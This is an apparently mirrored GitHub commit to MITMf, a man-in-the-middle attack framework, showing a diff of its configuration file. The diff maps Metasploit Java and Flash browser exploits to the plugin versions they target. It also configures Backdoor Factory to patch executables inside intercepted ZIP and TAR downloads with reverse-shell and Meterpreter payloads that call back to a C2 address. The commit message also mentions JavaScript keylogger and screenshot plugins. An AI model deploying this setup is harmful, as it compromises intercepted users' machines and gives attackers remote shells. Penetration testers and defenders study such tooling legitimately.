mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-08-21 05:53:30 -07:00
This commit is just to push the changes so far to github , still have to tidy things up here and there and fix some bugs (also I really hate javascript)
JavaPwn plugin has been renamed to BrowserSniper (cause it now supports java, flash and browser exploits), it's been completly re-written along with it's config file section Addition of the screenshotter plugin, currently there is a bug when decoding the base64 encoded png files (a very wierd one) , but other than that it works (did i mention i hate js?) Jskeylogger's javscript now works on every browser except FF mobile (have no clue what's with that) p.s. did i mention i hate JS? Plugins that deal with javascript now read it from a file as supposed to having it built in (encoding issues) fu javascript User agent parsing is now built in and handled by core/httpagentparser.py, this because the user-agent library is a pain to install on some distros , also removes 3-4 deps which is a plus also fuck javascript
This commit is contained in:
byt3bl33d3r
parent
86870b8b72
commit
ff39a302f9
32 changed files with 4378 additions and 681 deletions
|
|
@ -18,7 +18,8 @@
|
|||
pass = beef
|
||||
|
||||
[[Metasploit]]
|
||||
msfport = 8080 #Port to start webserver for exploits
|
||||
|
||||
msfport = 8080 #Port to start Metasploit's webserver on that will host exploits
|
||||
rpcip = 127.0.0.1
|
||||
rpcpass = abc123
|
||||
|
||||
|
|
@ -231,37 +232,90 @@
|
|||
skip_in_mass_poison=1
|
||||
#you can add other scripts in additional sections like jQuery etc.
|
||||
|
||||
[BrowserPwn]
|
||||
[BrowserSniper]
|
||||
#
|
||||
# Currently only supports java, flash and browser exploits
|
||||
#
|
||||
# The version strings were pulled from http://www.cvedetails.com
|
||||
#
|
||||
# When adding java exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
|
||||
#
|
||||
|
||||
#
|
||||
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
|
||||
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
|
||||
#
|
||||
[[multi/browser/java_rhino]] #Exploit's MSF path
|
||||
|
||||
Type = PluginVuln #Can be set to PluginVuln, BrowserVuln
|
||||
OS = Any #Can be set to Any, Windows or Windows + version (e.g Windows 8.1)
|
||||
|
||||
[[Multi]] #Cross platform exploits, yay java! <3
|
||||
Browser = Any #Can be set to Any, Chrome, Firefox, IE or browser + version (e.g IE 6)
|
||||
Plugin = Java #Can be set to Java, Flash (if Type is BrowserVuln will be ignored)
|
||||
|
||||
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
|
||||
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
|
||||
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
|
||||
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
|
||||
multi/browser/java_jre17_exec = 1.7.0.6
|
||||
multi/browser/java_jre17_jaxws = 1.7.0.7
|
||||
multi/browser/java_jre17_jmxbean = 1.7.0.10
|
||||
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
|
||||
multi/browser/java_jre17_reflection_types = 1.7.0.17
|
||||
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
|
||||
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
|
||||
multi/browser/java_jre17_method_handle = 1.7.0.7
|
||||
multi/browser/java_jre17_driver_manager = 1.7.0.17
|
||||
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
|
||||
multi/browser/java_storeimagearray = 1.7.0.21
|
||||
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
|
||||
#An exact list of the plugin versions affected (if Type is BrowserVuln will be ignored)
|
||||
PluginVersions = 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.23, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.3, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0
|
||||
|
||||
[[Windows]] #These are windows specific
|
||||
[[multi/browser/java_atomicreferencearray]]
|
||||
|
||||
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
|
||||
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
|
||||
windows/browser/java_mixer_sequencer = 1.6.0.18
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.5.0, 1.5.0.1, 1.5.0.10, 1.5.0.11, 1.5.0.12, 1.5.0.13, 1.5.0.14, 1.5.0.15, 1.5.0.16, 1.5.0.17, 1.5.0.18, 1.5.0.19, 1.5.0.2, 1.5.0.20, 1.5.0.21, 1.5.0.22, 1.5.0.23, 1.5.0.24, 1.5.0.25, 1.5.0.26, 1.5.0.27, 1.5.0.28, 1.5.0.29, 1.5.0.3, 1.5.0.31, 1.5.0.33, 1.5.0.4, 1.5.0.5, 1.5.0.6, 1.5.0.7, 1.5.0.8, 1.5.0.9, 1.6.0, 1.6.0.1, 1.6.0.10, 1.6.0.11, 1.6.0.12, 1.6.0.13, 1.6.0.14, 1.6.0.15, 1.6.0.16, 1.6.0.17, 1.6.0.18, 1.6.0.19, 1.6.0.2, 1.6.0.20, 1.6.0.21, 1.6.0.22, 1.6.0.24, 1.6.0.25, 1.6.0.26, 1.6.0.27, 1.6.0.29, 1.6.0.3, 1.6.0.30, 1.6.0.4, 1.6.0.5, 1.6.0.6, 1.6.0.7, 1.7.0, 1.7.0.1, 1.7.0.2
|
||||
|
||||
[[multi/browser/java_jre17_jmxbean_2]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
|
||||
|
||||
[[multi/browser/java_jre17_reflection_types]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
|
||||
|
||||
[[multi/browser/java_verifier_field_access]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.4.2.37, 1.5.0.35, 1.6.0.32, 1.7.0.4
|
||||
|
||||
[[multi/browser/java_jre17_provider_skeleton]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Any
|
||||
Browser = Any
|
||||
Plugin = Java
|
||||
PluginVersions = 1.7.0, 1.7.0.1, 1.7.0.10, 1.7.0.11, 1.7.0.13, 1.7.0.15, 1.7.0.17, 1.7.0.2, 1.7.0.21, 1.7.0.3, 1.7.0.4, 1.7.0.5, 1.7.0.6, 1.7.0.7, 1.7.0.9
|
||||
|
||||
|
||||
[[exploit/windows/browser/adobe_flash_pcre]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Windows
|
||||
Browser = Any
|
||||
Plugin = Flash
|
||||
PluginVersions = 11.2.202.440, 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296
|
||||
|
||||
[[exploit/windows/browser/adobe_flash_net_connection_confusion]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Windows
|
||||
Browser = Any
|
||||
Plugin = Flash
|
||||
PluginVersions = 13.0.0.264, 14.0.0.125, 14.0.0.145, 14.0.0.176, 14.0.0.179, 15.0.0.152, 15.0.0.167, 15.0.0.189, 15.0.0.223, 15.0.0.239, 15.0.0.246, 16.0.0.235, 16.0.0.257, 16.0.0.287, 16.0.0.296, 16.0.0.305
|
||||
|
||||
[[exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array]]
|
||||
|
||||
Type = PluginVuln
|
||||
OS = Windows
|
||||
Browser = Any
|
||||
Plugin = Flash
|
||||
PluginVersions = 11.2.202.223, 11.2.202.228, 11.2.202.233, 11.2.202.235, 11.2.202.236, 11.2.202.238, 11.2.202.243, 11.2.202.251, 11.2.202.258, 11.2.202.261, 11.2.202.262, 11.2.202.270, 11.2.202.273,11.2.202.275, 11.2.202.280, 11.2.202.285, 11.2.202.291, 11.2.202.297, 11.2.202.310, 11.2.202.332, 11.2.202.335, 11.2.202.336, 11.2.202.341, 11.2.202.346, 11.2.202.350, 11.2.202.356, 11.2.202.359, 11.2.202.378, 11.2.202.394, 11.2.202.400, 13.0.0.111, 13.0.0.182, 13.0.0.201, 13.0.0.206, 13.0.0.214, 13.0.0.223, 13.0.0.231, 13.0.0.241, 13.0.0.83, 14.0.0.110, 14.0.0.125, 14.0.0.137, 14.0.0.145, 14.0.0.176, 14.0.0.178, 14.0.0.179, 15.0.0.144
|
||||
|
||||
[SSLstrip+]
|
||||
|
||||
|
|
@ -315,91 +369,93 @@
|
|||
# Tested on Kali-Linux.
|
||||
|
||||
[[ZIP]]
|
||||
# patchCount is the max number of files to patch in a zip file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
# patchCount is the max number of files to patch in a zip file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
|
||||
patchCount = 5
|
||||
patchCount = 5
|
||||
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
|
||||
blacklist = .dll, #don't do dlls in a zip file
|
||||
blacklist = .dll, #don't do dlls in a zip file
|
||||
|
||||
[[TAR]]
|
||||
# patchCount is the max number of files to patch in a tar file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
# patchCount is the max number of files to patch in a tar file
|
||||
# After the max is reached it will bypass the rest of the files
|
||||
# and send on it's way
|
||||
|
||||
patchCount = 5
|
||||
patchCount = 5
|
||||
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
# In Bytes
|
||||
maxSize = 40000000
|
||||
|
||||
blacklist = , # a comma is null do not leave blank
|
||||
blacklist = , # a comma is null do not leave blank
|
||||
|
||||
[[targets]]
|
||||
#MAKE SURE that your settings for host and port DO NOT
|
||||
# overlap between different types of payloads
|
||||
|
||||
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
|
||||
|
||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||
FatPriority = x64 # choices: x86 or x64
|
||||
|
||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||
|
||||
CompressedFiles = True #True/False
|
||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||
FatPriority = x64 # choices: x86 or x64
|
||||
|
||||
[[[[LinuxIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||
HOST = 192.168.1.168 # The C2
|
||||
PORT = 8888
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
||||
|
||||
[[[[LinuxIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 9999
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||
|
||||
[[[[WindowsIntelx86]]]]
|
||||
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
PATCH_METHOD = automatic
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8443
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = False
|
||||
PATCH_DLL = True
|
||||
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
||||
CompressedFiles = True #True/False
|
||||
|
||||
[[[[LinuxIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||
HOST = 192.168.1.168 # The C2
|
||||
PORT = 8888
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
||||
|
||||
[[[[LinuxIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 9999
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
||||
[[[[WindowsIntelx64]]]]
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
PATCH_METHOD = automatic
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8088
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
PATCH_DLL = False
|
||||
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
||||
[[[[WindowsIntelx86]]]]
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
# PATCH_METHOD = automatic
|
||||
PATCH_METHOD =
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8443
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
PATCH_DLL = False
|
||||
MSFPAYLOAD = windows/meterpreter/reverse_tcp
|
||||
|
||||
[[[[MachoIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 4444
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
[[[[WindowsIntelx64]]]]
|
||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||
# PATCH_METHOD = automatic
|
||||
PATCH_METHOD =
|
||||
HOST = 192.168.1.16
|
||||
PORT = 8088
|
||||
SHELL = iat_reverse_tcp_stager_threaded
|
||||
SUPPLIED_SHELLCODE = None
|
||||
ZERO_CERT = True
|
||||
PATCH_DLL = False
|
||||
MSFPAYLOAD = windows/x64/shell/reverse_tcp
|
||||
|
||||
[[[[MachoIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 5555
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
[[[[MachoIntelx86]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 4444
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
||||
[[[[MachoIntelx64]]]]
|
||||
SHELL = reverse_shell_tcp
|
||||
HOST = 192.168.1.16
|
||||
PORT = 5555
|
||||
SUPPLIED_SHELLCODE = None
|
||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue